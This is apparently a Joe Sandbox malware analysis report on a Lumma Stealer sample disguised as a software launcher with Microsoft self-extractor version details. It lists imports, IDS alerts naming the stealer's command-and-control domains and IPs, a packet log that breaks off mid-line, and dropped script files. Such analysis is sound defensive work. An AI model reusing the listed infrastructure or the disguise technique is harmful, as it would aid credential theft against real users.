RT_RCDATA	0x2abf0	0x7	ASCII text, with no line terminators	English	United States	2.142857142857143
RT_RCDATA	0x2abf8	0x7	ASCII text, with no line terminators	English	United States	2.142857142857143
RT_RCDATA	0x2ac00	0x4	data	English	United States	3.0
RT_RCDATA	0x2ac04	0x7	ASCII text, with no line terminators	English	United States	2.142857142857143
RT_RCDATA	0x2ac0c	0x4	data	English	United States	3.0
RT_RCDATA	0x2ac10	0x1d	ASCII text, with no line terminators	English	United States	1.2758620689655173
RT_RCDATA	0x2ac30	0x4	data	English	United States	3.0
RT_RCDATA	0x2ac34	0x4	data	English	United States	3.0
RT_RCDATA	0x2ac38	0x7	ASCII text, with no line terminators	English	United States	2.142857142857143
RT_RCDATA	0x2ac40	0x7	ASCII text, with no line terminators	English	United States	2.142857142857143
RT_GROUP_ICON	0x2ac48	0xbc	data	English	United States	0.6117021276595744
RT_VERSION	0x2ad04	0x408	data	English	United States	0.42151162790697677
RT_MANIFEST	0x2b10c	0x7e6	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.37734915924826906

Imports

DLL	Import
ADVAPI32.dll	GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll	_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
GDI32.dll	GetDeviceCaps
USER32.dll	ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
msvcrt.dll	?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
COMCTL32.dll
Cabinet.dll
VERSION.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA

Version Infos

Description	Data
CompanyName	Microsoft Corporation
FileDescription	Win32 Cabinet Self-Extractor
FileVersion	11.00.19041.1 (WinBuild.160101.0800)
InternalName	Wextract
LegalCopyright	Microsoft Corporation. All rights reserved.
OriginalFilename	WEXTRACT.EXE .MUI
ProductName	Internet Explorer
ProductVersion	11.00.19041.1
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-04-12T02:08:46.514925+0200	2049038	ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2	1	185.199.108.153	443	192.168.2.4	49711	TCP
2025-04-12T02:08:54.120508+0200	2061407	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (xcelmodo .run)	1	192.168.2.4	55875	1.1.1.1	53	UDP
2025-04-12T02:08:54.244709+0200	2061393	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soursopsf .run)	1	192.168.2.4	49805	1.1.1.1	53	UDP
2025-04-12T02:08:54.392812+0200	2061395	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (changeaie .top)	1	192.168.2.4	54682	1.1.1.1	53	UDP
2025-04-12T02:08:54.869406+0200	2061396	ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI)	1	192.168.2.4	49719	104.21.42.7	443	TCP
2025-04-12T02:08:54.869406+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49719	104.21.42.7	443	TCP
2025-04-12T02:08:56.990554+0200	2061396	ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI)	1	192.168.2.4	49724	104.21.42.7	443	TCP
2025-04-12T02:08:56.990554+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49724	104.21.42.7	443	TCP
2025-04-12T02:08:58.093297+0200	2061396	ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI)	1	192.168.2.4	49726	104.21.42.7	443	TCP
2025-04-12T02:08:58.093297+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49726	104.21.42.7	443	TCP
2025-04-12T02:08:59.054235+0200	2061396	ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI)	1	192.168.2.4	49727	104.21.42.7	443	TCP
2025-04-12T02:08:59.054235+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49727	104.21.42.7	443	TCP
2025-04-12T02:09:00.944764+0200	2061396	ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI)	1	192.168.2.4	49728	104.21.42.7	443	TCP
2025-04-12T02:09:00.944764+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49728	104.21.42.7	443	TCP
2025-04-12T02:09:02.187885+0200	2061396	ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI)	1	192.168.2.4	49729	104.21.42.7	443	TCP
2025-04-12T02:09:02.187885+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49729	104.21.42.7	443	TCP
2025-04-12T02:09:04.507669+0200	2061396	ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI)	1	192.168.2.4	49730	104.21.42.7	443	TCP
2025-04-12T02:09:04.507669+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	104.21.42.7	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2025 02:08:42.934345007 CEST	49671	443	192.168.2.4	204.79.197.203
Apr 12, 2025 02:08:43.246442080 CEST	49671	443	192.168.2.4	204.79.197.203
Apr 12, 2025 02:08:43.855848074 CEST	49671	443	192.168.2.4	204.79.197.203
Apr 12, 2025 02:08:45.059057951 CEST	49671	443	192.168.2.4	204.79.197.203
Apr 12, 2025 02:08:45.276665926 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.276707888 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.277621031 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.287086964 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.287101984 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.512727022 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.512861013 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.517713070 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.517723083 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.517981052 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.537528992 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.584270000 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.738631964 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.738709927 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.738739014 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.738763094 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.738771915 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.738806963 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.738809109 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.738820076 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.738878965 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.741811037 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.746511936 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.746550083 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.746570110 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.746579885 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.746645927 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.749490023 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.752360106 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.752418041 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.752429962 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.773108006 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.773125887 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.773200035 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.773210049 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.773231983 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.773288012 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.850697994 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.850729942 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.850809097 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.850821018 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.850841999 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.850863934 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.867357016 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.867376089 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.867445946 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.867456913 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.867543936 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.882055998 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.882071018 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.882123947 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.882133961 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.882164001 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.882184982 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.893407106 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.893424034 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.893481970 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.893491983 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.893505096 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.893523932 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.960047007 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.960067034 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.960125923 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.960140944 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.960186005 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.969526052 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.969542980 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.969599009 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.969605923 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.969630003 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.969656944 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.977830887 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.977844954 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.977886915 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.977895021 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.977931023 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.977952957 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.987423897 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.987437963 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.987495899 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.987504959 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.987557888 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.994035959 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.994051933 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.994122028 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:45.994129896 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:45.994172096 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.000099897 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.000117064 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.000313044 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.000319004 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.000364065 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.007427931 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.007443905 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.007519007 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.007524967 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.007575035 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.013200998 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.013219118 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.013288021 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.013295889 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.013331890 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.057889938 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.057907104 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.058131933 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.058145046 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.058185101 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.065912008 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.065929890 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.065998077 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.066004038 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.066061974 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.070907116 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.070924997 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.071000099 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.071006060 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.071055889 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.076113939 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.076132059 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.076191902 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.076199055 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.076251030 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.081078053 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.081103086 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.081166983 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.081172943 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.081219912 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.086216927 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.086237907 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.086287975 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.086293936 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.086333036 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.091134071 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.091150999 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.091216087 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.091222048 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.091259956 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.095412016 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.095429897 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.095495939 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.095503092 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.095532894 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.095556974 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.099335909 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.099351883 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.099435091 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.099442005 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.099486113 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.102984905 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.103003025 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.103070021 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.103076935 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.103123903 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.105125904 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.105201960 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.105207920 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.108824968 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.108840942 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.109025955 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.109034061 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.112370014 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.112385035 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.112447023 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.112457991 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.115839005 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.115852118 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.115911007 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.115917921 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.119131088 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.119144917 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.119204044 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.119210005 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.122312069 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.122325897 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.122390032 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.122395039 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.125411034 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.125426054 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.125495911 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.125504971 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.129158974 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.129173994 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.129297018 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.129304886 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.163661003 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.163678885 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.163820028 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.163847923 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.169063091 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.169078112 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.169121027 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.169137955 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.169152021 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.172348976 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.172363997 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.172424078 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.172446012 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.174905062 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.174920082 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.174982071 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.175004005 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.175024986 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.178380013 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.178395033 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.178455114 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.178479910 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.181034088 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.181049109 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.181113005 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.181133986 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.183742046 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.183757067 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.183815002 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.183837891 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.186108112 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.186121941 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.186180115 CEST	49711	443	192.168.2.4	185.199.108.153
Apr 12, 2025 02:08:46.186203003 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.189111948 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.189130068 CEST	443	49711	185.199.108.153	192.168.2.4
Apr 12, 2025 02:08:46.189188004 CEST	49711	443	192.1

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report IMSoftware{Launcher}3.21.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\IXP000.TMP\67f525209658e.vbs

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_14fuzhmv.xmy.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gycc5epo.f02.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h1eildwh.3zh.psm1

Windows Analysis Report
IMSoftware{Launcher}3.21.exe